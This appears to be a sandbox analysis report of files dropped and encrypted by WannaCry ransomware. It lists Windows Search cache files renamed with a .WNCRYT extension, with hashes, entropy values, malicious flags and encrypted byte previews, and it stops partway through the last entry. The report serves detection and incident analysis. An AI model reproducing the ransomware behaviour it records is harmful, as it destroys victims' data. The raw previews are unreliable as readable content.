SHA1:	B9FB998854828E7985EDB11AF9D6BA0A8FC52A1C
SHA-256:	3D678D7E116E2155F63E8B186ABDBA3D3EC8CCA899C84E9C3126520F974114BE
SHA-512:	5D4689D52687DC165FF5325E7EDE90C9B633CF29B965CE79EEF3782C0676B97F76B9431B3AA5549AFB1A728FACE6E03CCDF5C0CBD7CB1528DBCCC27810815B44
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........$...{....t.r..18P'.}.....Z.g0..;]E...v.Q;.;?.BI..8>..j.}..._.......[..........e..Fv...(...{...9u.d.?...)D....q.O&..J.....L.(...U.....X..>=....[iqFoe.&....%]w\..h.0.)zB....."..n.X....x.d..:..!iy....\....7u-.&.?....J...t...M.=...:......t............n..\|.].....}.nqu....bH'.8...M%.=HQ........^h@E....T...-..y..:...A.d..e.'....9.1..~Zx.>.l"xMQjM...R.@".(.$0<W.L....oY.v.....gH=..?ADF\|..5...7......9..X.........Qd..$;1..C.e.\|vW.l^....BxR.....4.n.#Gl.pHUu!6...xG.....F.CN_p...`.........SB.{..!Q\n.*-....}.)...!.F7ZQ.5[v..1N..f.R..]....C...:.m.../L;....(.......z...Ho..!-X,..G.C,0...#.....k......z....P..x.f..w.y.i_....9..dTU..kp{.FZ.\;\|9.a5.:....Z#k...~F..A&Cw......[A.......u..Z.Tw..F2."+................`....M...m.T.S....O.!...Q[{."......s..ka.&...I~..D......S.a,....yeiY@2......[......~.\|.;..@.N...G:.....b\|..U.BNi...tx`.:(;...u.-....c..y..b...@k.......CD.....PBI..L....<..b....}..aL...^.......~N.x..M..u].9._R..aO5.c..J......

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\VtUF32f3ww3GL58URxflQ8k2Xkw.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7720
Entropy (8bit):	7.978439939744061
Encrypted:	false
SSDEEP:	192:+QDDHTL0CwbjjeN66GJxOZ/Q6/0366U3pI9i:+wHsCAl6GJxOj/R3pR
MD5:	2136E7DDB3669AB3E949FCD9B84026BB
SHA1:	556714CB7DDB066BD67266921C27CD2D82F9020C
SHA-256:	EEBC4C677ABFDC51DBF377349409275A7E53A82504F6F28F44E19DC0365A7BDC
SHA-512:	CA746D1DC1CC4BA008F1D2841FCECF2908332DD04AEFCFCF22D8085CF5B67D30CE8CFC2E66861CFE592617CC90F7332B3A4EEF45DBCF073C29AAFA7D84D8AEA5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.............S.........uK....q.g..h..w.5f.}.<.....L.J... .;?Pf.").q..4....v]b.....s......i4.g'..(mi..W.JXE.........sdk...<...(.)O.......&G...K=.bR[...a...E.........8...K)..rv=.).9.3.B.............Y..(......e.....T.....$Mh.Qy..a,.........l..g..C.................F....5.g..z.K.....=.D.J....<oU..o.SR....r\|.,.......&..... r.B..~...z..O.........:...`..e.........._...o......Ejev..0.......L#.o.).E.)t.v.W..g..HRX&4.%\|........o..q+?q..k.)k.W.'X..............Vu...w...?.w]....+o,./cel..}.\|...5..m.B..@b..I...n.........N.....}..'...n...O.sV....-2Q...Q..p.1.......O.M.!P.j...%`.'o.......b.y.k_....(...(...3\|...^v...<..5.........x.?..T..>.(.D.\|{.....]..9.PId.rf2&.....8....."L.....bV.5v.._.x......=\|_...f.....Y..../.\|.Qy..\|..H........^.x.F....RQ.T..!...OJ.........A}dQu.=.V.J.a.]..Z.......4R..(/~.vr.....&.z..~mj.f...Z..c.Rbq.o.+..............k..i..[.6@.+..P.....8P.b..QB.;1.M.&y^.F.a...$..9...GB.!.>H7,...^c...2.`R...e..O.<..v.].,.o.\|..J...HZ.L....G.Dp

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	121496
Entropy (8bit):	7.998399587141098
Encrypted:	true
SSDEEP:	3072:fm/Thvm1Sg2C18IGDGT8zDKEtik+ZFRlofI6rX0E:+LhvkSgp18IjADy5ZPGhrB
MD5:	70F4EEDABF1BCB78A5BCCD5B76FD9B8E
SHA1:	49922E343F36E3EBF9F6BA31BD5F0D4CE07B7D4E
SHA-256:	DF4DEF0D9EA8BEDBFA47596FCBCC4D3750C3E22D3046BABF982ADB9A8F48FBBE
SHA-512:	DB7A7D3D7893129FF1E974FD05C70BAF36EFBA74FFC2DE2988B31AF764F5AB6F48F56EE276A523BC589594C0D0727C6FB80A3D8721072D07A9BD0DA1F9B3C8E3
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....&....R.OV....o.u...E2..b.@..,...G>.9HK?..Ql..{id...L.X.R+..aUc.\|.59..^C/.$6s......Sh.8cjf.(.......';l.>.L].>..v.C.....S....$..t....t..E...2.v..zW..[....Z.. Z.}..M.m.q....V7m....W.@..iDa......E.).5.5........}.@xT`.G.nb.p ..>..J..,........f.V.r....~.......#.......<..b4..vW.l.i.QW...Ef....l......m...]S...IY..9..,..@"\....xO&.B...SqEFiJ.t..sZp....r+Z....S..D.P..X.9....)...!.]<.....v........P....6..M.....h...W..g...\dS1P.7..o_.xF...NP....$M.n.._.0...R...0..4.Y.)".jL..fp.X....1...HS...4.V.v.:.%..z..N.S#.......\.x2...+.}.....h..m.X.\.6..w....aA...Jc..@..m. E..`...3..G.....(/.A.....=.v]......j..v~.6.O.z....G+2k,...k1...."6...E..".$.XE..r..w..4..dq8/..R.c.(\..~...}.....5..2.Y...!{y..]..r.....).f....\#.%.......<b.....K..[..K..M........T..d....s...n.?V...........(.6..g/...q\.../.I....f..7 .C...}..i.`w.M.+Q.2m...YOY.....>.4.u>L.A.p.Z....b...R.X...k2.x.#.F..fa1........02k.w..bL...v\|.0`VF....e'd.~.oE}.c....$..B..#<.D

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\axXWui3EcbJQ5EbqyMZWmTud9p8.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4024
Entropy (8bit):	7.954375045498233
Encrypted:	false
SSDEEP:	96:oKzJI1Oc15z2lLvZNcrnp2fcn/AIkJBzSGRM3uC6KlJKnHZyWRw:RzSOcD41Nhfc/AhBzSGRMkKOn5BRw
MD5:	2B1D4911430EF53E7E74189F8515E2C3
SHA1:	FB1F707C5A5B19F245E2A85BD3BFE617F8093719
SHA-256:	459BCC5A61B6A568E75EB8E4EE2D9A09B33821353226C9AB0976CC07346EA096
SHA-512:	9872940B71C37A748C9A441181E63D47E266855F6BBF5FAE9AA79DA2A337D7C46019750E53719CEF58CBD43CF9B90A75258045A9F9B2CDBFF6112516A7ACD21A
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..........W...kR.m0...&B...kHT"iI].R.H_.?..K..v.-..I.......?M...I..hXC......p...2;....(.._B......{...A....FD..%.-.\|.Q..V"K.. .....X...oo6.&d.O.N...9........)....cm.......\...4j,..9....+...-...1W............k....>e~U....T..s...p@H...:..C{.y.....[_.H. ..............$..>b..Rl\|995.........y.:.oX@...\|m..."..u.._".x7.5s7&..v.3.[...)..`<..t.+.Q.m.Ft4.Al..T......J.)6....o....tT.;..0...9#c.......qSgl.Y..X9............).A.(..,.$V1...)..d$#.&... p..VW..z.I..'[........`.........Uvo...'.KM@?.Y....0.,?...R......M."2.....L......](u;.z.....=]m.3........n}:.Fb..........4..e.~.D.t.Q.~......v.C.H].s..T...p..!#.S.._..;..u..U..L-+~q..(.@..Ua.9..?m..b....Z-.6.N...6....I.\S.Pj......ra.U.I.^.;tNNb..+.&.d.6'....#.....x.0.\.g......J-...M}..Q.....Wf...)..x.kF.Z.4...).%.......6.D.\|...p...@.....^ra.9B.,!...-AhD...9...%..G.y...B.rv.\|.........@d...J&.1T..)\|6.G..8..n.=.h.R.U.%.@.2".....Db...\|Fv.Jb{z.\|K.y.....']w-..jZrwF..-..~..+._......4..D..j.l.d.....Yz.,~b..k.0.&.%.9..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\cw-4WTgZp0NrpKwS93-E-ENgJ1s.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	58760
Entropy (8bit):	7.997034013454443
Encrypted:	true
SSDEEP:	1536:6uZrZCPcSbFOyWbXGrlMgUrH/keJI17TTmhqK:hro0SbE57G5jEH/kGIwhqK
MD5:	505C3017F51E5654E632093B0D9A4143
SHA1:	944D9233DCB452645EAFC5AC297534318C3537DB
SHA-256:	30856AB482FA11D2141E7295CE04F1E694C7CB633149EF221E5773AC1D9B508E
SHA-512:	F4F6D6D6B55957FF6E6D3FC0B7763B9A8BE0C657CA98942C5B33498DBBDF79CC455FD71F796DEC7FC920DBD2D5F53593BDC8D8F6A322A15B28B2263E5E7BEFEB
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....'(H:../...\|`....a.j..j?A7.SMW..R.6LN.GD..x....d..^V...^..M..Ow6../ido..<)..,.H\|....G$.>......b....!D?....].^.........%...U.zU$...v?.......`.Q.....R'...<i.9^...H.....i$..zE...%.......p.A.._.......q\|fkU...A,.p;.K>H..u}..Q.g1..9..\......=q..l_.....I.....m.......-16".\|#a.....-.d.....,k...Z~}.nk..t.>..gE..%#.Q.i..R..X.!...5.... ...iN..>\|..W 0Px.gnt0m..\|.<.....J..v...J........Y8...i7...3..C.=..1h{.d. .......DO..s.4.`..R.........d".5..H...7o%.A...F..u.8O....PFO\|R...0.....w.,.p.Z.D.!...J...5a.... ?.l.T\$.......;~\..\|wX.!#.8......P...O...Qmr/\..mO.K..V.......U(i..f.......y.<0.'..YYaU..........~...;.y...@..B.z3..\...u.E..C.m#.....c.`.....E .,...>..0...b3..#...M..*.B2FgW./w...........H.W.s..%.n....b..^......yR....WcG..!n.o.sr.L.c[.2u......i...!..E...`.M.-P.l.t..%....8.g...5...T....5.r..&.c.!pBC..V.{...Q..4...9O..N.........(~.?.a...,H.FiyU.6B.."...)..\|4..6..~..b.....C.;..S..q.pwB\|o.....f\|..}.D...+...)...O.5.bM0...<."P....~?..HA....3

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\h0_ymK9wPEJMicnVALPw5taHcNA.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	7.907865630785792
Encrypted:	false
SSDEEP:	48:bkoEICRwgofBQvXtpAoLbJedVjxumIQiD7SIG0Emj6QryULy4S4:oDIC6VQvtpA2eEmSe50Vj5ryUG4S4
MD5:	4F49A08C7EBF52F86A791277E9495203
SHA1:	06CBABD69F4F447D93EBEED7FD95DAE4DCE27039
SHA-256:	C3C343E6BE09B732A121E7D198D75C6099FB1DED8D8B52D727F8AAE2E45EF9EB
SHA-512:	14894F2B2AAD492EE52CACC6E596199C537D63FFB3F10D9E2A6CAB59F182B606E37AC6468FE6E70FA29B8456AF9D66AC0E9DB13CC4E9C59B50C9CB3133632FAA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....l.m..+.E.M)..To....B..r.A.zq.l..)02.V..D........i.7(....Y^\|..kvY..n{...x...`U#....2...r.Y............E...I....(.....\...y...B..Z.ZE...>.0...0m.y...8 w..+...d]....VWxk;%w...Q...Le.....T}}.].9..}e...g....].......7`.).........@G.k...J..T...]K.j....b.........!!...p.I.%-5_./2.7...s..{.l..f.....(.p^VF.X.Bh.S.7.6kg..bE..{[..B.<......{..,........JF......%.=..>.b..s#..l%7.X.o..;.[.]r......cO...X.TO=_..G.W...I......g._.2(Z.0x..Bc.....j...gI.n...^}.@..."V...8q#8.i..Wx.E..Y.....X2.n.".g>j\z^..'....a......a...(i{..1gv..[..P[u)...m....Vw.sjO....+..7p.P5.y..(n3.?n..J^.....q.^...eu.y.4...'.....Nt.i$."..P.....x8q.N..N8.;Y.e$...f...z..z=.u.c.5..r.*b..'..,.^...zL...O4..=.;..._.f.J.w7g d.B.~....Hm..&......&I...W.h.....B......P.-..Rw.t9 ...........6..K.g.]s.......P./F`.7..Y...R...v.....>.1...h....+.T.7.P. .'.G...q.^.}....2)..e.Kw[..m.u.J..-^..n% M.Md.q...v.W.X.q&..r..s..Np...c.K...`.3{...1.@}L.+..sn.7.+.\|......%.......V....9w...........m

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\ircBWLoXEfmboO3a70zv4wR3qco.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	93608
Entropy (8bit):	7.997834760580903
Encrypted:	true
SSDEEP:	1536:WqnstPJF4e8WD3+hoykYkLZvpB8nZJpe73D4NKHManoTOPyuOZczDaMcDme+FDR:WqnstPJF43gXOq2X1NEngOPyUDnc9+z
MD5:	52FD0BE490515756A2A739DB3C729191
SHA1:	5DB5154E89AA078B269EC89143DB6D58E1BAF207
SHA-256:	45649EB9296844A1F6727825668734CD00129274CB83C9100FC5E0198F50DC1A
SHA-512:	758B5326E6D1267CC16E56EE1D8378B120DD1A85D113E5DF6390213F8B3015D05D97E254AAB8671831CD638BD84A91D75F987CAC88880295F1CF66C762AB34D6
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!............".MR.F..I..o....v..:... .Uq..cO8....@.b.. ua..=...7...J.u.S..iA............'....DLb/7.x]....\....".z.\|.....\|.t.b.<....l.;WBQ.8?.ZQ.....\|...~.;.?5.......V....C..x.&b.\1. .]1..Z1.lR....u=f.nRX.@.=....>.......\|.sj...l....{..D.C.....v."......l........."...a....s.j..&\..-x;d..5..C....@{..<.].h..d.4...,.d..g.....D.T..)..U...h..........}...Y.b.Me..V(..`..[ccO..~....?.&....x....cc..>nE~:jh.@.&M..H..i....Q.>....VU.p.95...c+.SA^E.%w...R!....:o.T....~9..t#`KZ&.-W.T]...W.i..[...`..pfV.i........a.%}."./.\|F)`.#.s....y......>T.....g.g.;.....f...........)..b....Gl.U..:v......R....j..\|Kq........k.....#.n......\|..l.9......{...'.V.E..=...\|qD..[.........j.Z.u.`O...A...l{$..h2}...-.fM..c..<$k_...2...mA.......!....0PA=#.Xl...^C.{...ELJ...{.......j$G..&..""$..b...d.u.1....j..,..'.y,T..........?...u.(...MF..-.I.r.B..c.b...x.y7B.e7..b..D...........kF.Zh.+.(...\|6...S.rp..WPI...RJ,............N3.q...bP..NU.....+f..qr.@..2.u26

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\q11NvYzJks_3Zy5BRKPM9baeQ7M.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2152
Entropy (8bit):	7.9191386435990925
Encrypted:	false
SSDEEP:	48:bk6fRHAdxSai/h0HelJ0p8oNo2Tl18LelmLA3j7psfdfyGmxFl:o6fRHAPSN/gkJ0pzo2Tlr73PpsfdSL
MD5:	582160DC5186498CFEC45C91BB502570
SHA1:	F823B3742F4A89077E7B897B3AEC6B0BABA355FD
SHA-256:	436336663940DCFB1976AF3A5BD34C9EEBA75F068231C644B44FCFD2EB9F6C21
SHA-512:	A028ADD05F1AF085F3ECBD8F2FA18E599EB725619949D731A41915F72EA1039A2AEEFA8A09B80ECC31B3227C9CD873CE72D690F74CDD9CFFD4C3A4EF3B347A5A
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......_v...cX..}L e.\|.7g..".Fy.$Pn'.o/5........d......!x.>..........e.(......j.4.(F(...@ ..1..(......=.?...\|.+..>.s..h.\.&...?.7E.@^.f$7..Iz.1..a..K...2u.J........o...Wk#X..../..Ok...42..."MnZeB..md,.hu........t...n[A.........#.eryb-..xU.)....h......C...........x2o<"{D.)P.7.2...h.x5..q.b...-..Q#u/....bW.U..]...C.g)d.+.5&.U....".....'}.#....(..>.r.N.V...X.1..t....('.d.&.7.1..'u.....J.....8<. a...Bi1.C........G...46.x.>..7.N...j./\|...H....D.L(-.X...M..X...Ue....).[n....=.`.3..)..!...jr.`..IA:1..f.z.....U.P[Ch.E.+....%..!...3~...(.......A...>%.EN.WBLLZ.~...9.....H.@H...~..M.'.w..J...q...h.u6L8...9..,. .... .__.....p....z.W..;..F...f.1>_2.....V!.....@.WR.i\|.6...G.K.a..t...;w..=..r.E....>...(._.A...\....;....U.f5...os....x..7.w...7..Lr..... ..2.(.U.].{.m.'fk.{.(\..-}O/..4..t.zqI..X;..........J..)N....@.J.B.b..CKq.[t.9.P.'..*._..i+.\|..=1[M0}...~...T...jp...../..-z..-...!...~...Ie...;..-......M../W..].y.!H...Ln.?.Y2.;v..F.C....."-2..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\rUQ8SSsIzKcgb77SIOCfnAbpfB4.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	408
Entropy (8bit):	7.429275266046919
Encrypted:	false
SSDEEP:	12:bkE54OMxYYtFQxS3T65x8FYifB5VJzTGS:bky4OOhjBfBv9p
MD5:	4081DF4D8E53864BC6F46B43AE480C56
SHA1:	B23927D480CB0E7151B43F0D2BF4F7B2DA2BB900
SHA-256:	34A8096DF46D0E5ED5917E4434BC58E70D71A0324B2B88C127D9C91EA2CFEDF1
SHA-512:	ACD600D63D494D3C72C4F346ADD990E137ED8A2E910B5695B22060A944DE77F60B8553F0BFE9294E2B7CE553757E07AEC38733A72F4860C386D547AEF901179C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....../.E.........s.....F..&s...o\|.i!.#0cj..m.H..F.~X.=d....},w..#>9.....t...wB........v.......E:*..b.X..o5.c%..._K...].a.O.....Z..+..Q%.b...?Jur...Y.@.p.U@3.$}.....f....m.I.....k.\|....J@.0...]...l.....c.U.h<.....J..B..y..Q.NB...w......B...=.H.MF....q........4.;K.Y.[.`........3\..C;.hm........T....\|...6......a...as...#..../P......KV..4G.q...5.h....joWb(..9........;.+../.......R.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\sYHi3_WAt3g9uPzpsKvYVUQuz_g.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2040
Entropy (8bit):	7.9109233179018
Encrypted:	false
SSDEEP:	48:bkoyvkN9gIo1TxyKhdZOGe57RHat/QIB7RtKc2CYpN:ooyMgFTAuOGejw7PKjCeN
MD5:	8940A6ED992A0333EA85CAED23483388
SHA1:	49BFE6222C1C73A008781EA9F2D7CE81EE35D217
SHA-256:	032EEC39C775A28DDED38F3B5E78D5027368D8501DC4AA016DF028E9F7A08094
SHA-512:	DB9EC88A2905D19EFA3E42BA02B856EB62D3AE3AD6B63DA158996B676C4FD92F2C194BB4038DDC8EA6FB4C78D4D0AF44AFA4ED8DD42C756474C08ADAB95DA7AD
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......1........7H.\|c...^ ...Ra+giJI..X.....@'.......c......Z.y.L....I.B....'3.L...CLI1.\|N1..k../d.".a..HR...<5..-i....Y)bM.4...h^Z.s..c9@4c;.?.U..3...........V.z...."........>...e...X!..BA.._.2Ae.A...\|4.-.....U.:.T...Y..l1.4.8W......j.1..aI@P..................V....KN.BN>/.e4[.#).[.AH\|cL.h.$.].2g..3.~...u.%G&.`.)...b..]NG....q...E...8G...a .Y...r".ck......F..\....@.k.3\|..!$V..8..,.....AG^g....5.<..I...g6]&G.,...gQv...R..........a.S....JR.t......q.U.5W2(Djb..1.p....N@..nu.`.q....:&....;y<E..F......q!$......1.8..1.6.G........:.s.a..'....a.l.3.D.'iO>.........ke..OO..z&m.:.q....!\5....{'../\|....[y0.-........d...a..nH.tYf..kLhX..DU\|u.q}L...YkX7..I....}.f6..O.<......}.h...?..Km...NC...^...(..@....a...7....r1.....@...M...-....~.....m.bG......e....Hy...K..r.....W....(...~.......^._..r..73.....2.}.YR.......=..&...o..<I......e.e.t...f...q4.L..^...y...M.ZL...>.p...B.2.c..1.J.$...o..G;..............K...2....d.....p.#.5.^Mo}..pb%.zC...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\uDG2gcZvfxPQf2ViIjeZuGGTEzs.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7144
Entropy (8bit):	7.973257595698507
Encrypted:	false
SSDEEP:	192:0Lcv8u38Wuter17lkKHopSf4pei0GilnbsQoFMN7sZKJjnqSUF:0gv8krb173GEEkGitbKFMN4gQSK
MD5:	53989AD7B1B6550A4EAD1D6B2815E858
SHA1:	95A97EB9EEFD12056F9988DA615FF051827D213C
SHA-256:	799621F06113F41FB0AE3A5B1EDBA9091505C600D00C12C14354BB262976652E
SHA-512:	8FC547D91484A9FA75BAC7417EBD3B6F11D706C8A301156A2A9162DC3C00FDEEA87982BA571434CFDB48E412933E4A9A36E6CECD3BC261AFA84BE8C76316D58D
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....o....p..;C@#.Ck9Q......%..U.H1.+4G.K6i....L;.........BS;yo.>EJ..,.Uu...d...H./..hq..,h}DB........z.\|kLJ.[....L..w...%.r.f..m....L..(Z..:_...>..G.OA%..<./..C.f.81.8.Y.d....vVc..m7.C+-..O3..L..7...(.0....8..G1.h"...S.......H....IiBwdF.T.l~R............9.y.....Ux".o....#.Ua?.(..O.y.-.UA..yJ.r.1....1...._e......s.'...)(t..3.mu..P.O..S.....#.7..p.......q>z..F[`.q...3.=?.E.i.Y.Cc.nB.....1Bq$...}.39..........Ml.dI....[..uU.R....V.........j..E.$.E..7.%..U.O....S........y. .ry.$.>Dr.........\|p..`.A\|..p...@.x...@.. ^$..~.j..v.....R."9xG..l..]...yz-.b...y./..........RgR..wVM.tMU.x...."....?."....a.z[........`.mD....C...7.x...L...G&5...[.??\..w....K<.L.N.x..H.....t.$.i.-.8....t1...Q.A.j..6y...........]?........V..`...T.cf.....J....7.{...;..W..Q..-..p7.X._.PT$B>.f....q.r...@.......S.d-T........1y.1..p._..#... #G..-.......D.c...7<.....D........[5..dj../e.Q....}z.w...>E.Gst...Q..M.`...`+8.0xi)...pS...P.......xE..}.@.x@....\|QE.....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\z_vjAju0aSvaiavYhvMyCAUkhHU.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	39592
Entropy (8bit):	7.995121083604943
Encrypted:	true
SSDEEP:	768:ZEvdpFhOIpHFEcPRiul1gK3CebTFrbfMWbXnqfYNK/M:mOuH1iA3lrTMYK/M
MD5:	A8D1086C611E7DA7404E032192E20214
SHA1:	2630A42D3BEEE47A4E502BAB656937F7D19D73D0
SHA-256:	200569E42FA3BFE91F8924BF15D611954717E7063BEAE45FEC67CADFC1DF3B58
SHA-512:	7D5AA7A09B36FF472626A78A7A0ACD3681405F365CE6C59461A451F92D75142A41E4EC5CBB5EAEC7D3CD1529946994EE099AE7F99FF5583E7BEF2520C52A2479
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....1.5VDp.j.qV.y...<..NQ.....C<.G..S.............z..[U..#J..y.....:^a...W....Sc}N.4.o.\6.....t.P....,....$X...g.=9..;...US./.~A..,.....CKIi.;q.m..n.h..u\..62d<.Q..}.3.Y.$\|....S.T..V......$xWF....q..&.Q..ke..k..F.`...d.R'.N^...a..@."....@.m#...l=..N.........................e.....]4..........r?m.....x..)-..O...Y.`.]....U.E..V.(........6O.o..vK.Q.ln=dn....c.}.....m.'.....`d.^.3bA..(..,..G\...H.1.P...%...(h......~v9...jj>..........W...u?.I.2.kH.V..P..Y..:..E.7t.u}..2.).\|........."=....:V..UI...N".c,.aH....4&.(.x..q...lA.M..0.$.o......E...~}..S{_.....>..v....!...N..tm........s......'.(.1..-..p...l.nNi..O...Tn8.5......:....\|..6.^L...-..#"L!&I.........LE..#.&@^.f.:.......4.n)...!.Vo....x.....st....X......?4.K..]N.M\|gB......+O....j..i@..S.....c.9.....H.{..3wY......:....wM=Z.....\|G.~...m..K.I"..]..Sk....W>.&?.G..c.zf......}.5hxu1.E.o.g.8!!@.;Z.t..ge...\.S....`.>....^a7FM.m....Su..eW\`k.\|..UM.J.%v..........44..-..7.J....9..@W.U..pZ.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1573144
Entropy (8bit):	7.999879817070662
Encrypted:	true
SSDEEP:	24576:ma6jJBXDwQgurx1D1LdsjjE59dC21RF/oRwIuaLq7lJcnX9wjR9lBXDn8:maOBUQTrxfLdsjY9z1RRouILaJ8ERZI
MD5:	5B3C0BE347A18CB44C2927B2768EBF2A
SHA1:	63F834F799E51180C9A646B9A1415B1EC9D5DED0
SHA-256:	B89475AFEF8E227F544D900495E49B0ACF5E44684648BE5A889EC64193D45E13
SHA-512:	1474ECC82DE6DB4FE623B52DE2B25982BDA067E44B681D30D9690309F349B21AAE9AD7CD16587AD0F8994A7D45453F61D4B220701A16CE03B52D5F186F28AB49
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......C.S.....]/...q/.F5%8l.M}.J..PB....k?...$2...!.etZ=....k.&K[..p.H3G.3.u....v....y.fr%.....9....:N..u>......M....~....}.s..n:....'.-e.V.l..0....2....7eW..a.;.CW...hW+<..iQy.pXy....h.ACV..s4...c.Ti@.mz..<.4G.,.%......XK..35).CXy9.u...a.8S.................WN.~..Ei.m..]...tl.J3~...9...x....wPU.....x....(...z..+!P .}b.W..E.....`.X...C..]........g.0.........C^.x.:1...\|/.m.qb.....Z.A.B..W....4."LG3...3.7.y.z.e..]h........_..:..P%..4...44b.,....s.!..'....\..2Y.2&1..K.........q..Py5I.z.} ....#..P.;.-....~.".$..n..6.B..!e.........T....'.H.........~J.n\|.S.QW.'...R..,.<....h...#g .So..._....i..&.lOgk.XL:.p.:..O..(..zrU.h......A`f>..l<.h..F?R.A....6."'.......v...&.p.....6.0.../...]X.X.$.<...Y,....{P....jw...U.%_.{..u..u.z.w.!F.d....,..'..;7..y.M.......N..\X\|]s..Wb\....\.w...._.....Z........Q.."...r2.....9........?Khn8.x./t.-.'.../.)..cy...?.V....f.j..-.8.K..n.{.%.....?c..d..\|.......~P....H...4U...N$ u..q\,.g...xi..H`.0..=......C.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2097432
Entropy (8bit):	7.999907319634481
Encrypted:	true
SSDEEP:	49152:oBPdcTQgC6nSTgBM2vxHdyEUOXiGQlRGos2+Kf:oBysT2J9qOXivGos2Ff
MD5:	20524FDB98CE060BE4C23031862D0853
SHA1:	30475D876EF094E59AE78D597BA7887483262E5C
SHA-256:	9D0F3E274AD1147C0F72F45F46261DA9B69095763AA3EADC1ED9E3EFDC4D24CA
SHA-512:	257483368E89DE86C191B3095EEC74F1ED350B1F71DFD9069365DDCF6050EF607E3998B79946F07568B336CC695B26EA543BE7317CDD2C947B7B5DA4BE1BDB5D
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....SU=...,S...0.D..D{..!....~}.U......J.f..[Z...g.r..r..3!'uv.3....<..P.Lf/}) ..R.D.B,.....[.'.9l.l~..J.@:...H.....R..L...=..ZQ2.#.t.4.m.I.N..u.~7C...~N..j....f^...[zJ.GA:L..]l.Z..u......ah...G.<>k..y.D7........2..X..J.ip.).S#b4;.&.z.....$Q.[>...O.(..)...... .....lP..>B.V\|.........Q...~..q....).}.....J...5U:.?....4>.d.........!.....PvT.k'.S.50.Od..U...#&y.<..)+...!Ld.x.....$..a.F..`hk.....]v..<)....U...\%...l..47v...Q.....L...]......;1.".b.`..l......$..u(gC..C.g.,[....F.9.N.oB...w..:.7T...'.DM`.i....[......u*.3e...hM..2.<.A..@R.b.\|bo{{.^..l.........S...r..E..[<......7..&m..>@.....^^G{.[.......,.....p...A...u......!v7p.hq._[.2\7.+..Y.V....D.0.TdG.7..M.c0.+r.k5...4...;3.N;....U.:..4.....N...%.WTf..$..:...I........i......h.I'?!...........7....S.-.}U0.+..a(F..9.i....C..w...u..R....G.d.;...]...b.V....4?&2.,........3.../.'..D..]!..pY]....\|.J......z.F.o.!r7.cg...hC.......,Mh0.k.c.....@...<...cQ..).sN.).....?..$....c..<v..%....?g.ieB

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{46669ec3-9227-40ac-89bc-b477e4677a0b}\0.0.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
